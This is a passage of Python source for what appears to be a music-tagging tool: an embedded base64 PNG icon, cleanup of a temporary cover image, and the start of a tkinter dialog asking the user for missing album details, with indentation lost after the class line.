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"""
try:
    if os.path.isfile(ex.tide+'/'+'temp-vox.jpg'):
        os.remove(ex.tide+'/'+'temp-vox.jpg')
except OSError:
    print('Erra Prince7: could not remove temp-vox.jpg')
class taffy:
dataToReturn=None
def handler(available, issue): # Prompt the user for the missing album cover, album name, or artist name.
ram.LiveFeedback='Waiting for User to Enter Missing data.'
taffy.dataToReturn=None
roota = tkinter.Tk()
background_image2=tkinter.PhotoImage(data = img.D)
roota.iconphoto(False, background_image2)
w = 600
h = 400
ws = roota.winfo_screenwidth()
hs = roota.winfo_screenheight()
x = (ws/2) - (w/2)
y = (hs/2) - (h/2)
roota.geometry('%dx%d+%d+%d' % (w, h, x, y))
roota.resizable(0, 0)
roota.configure(bg='#000099')
roota.title('Missing Album '+issue[0].upper()+issue[1:]+'.')
donna=400
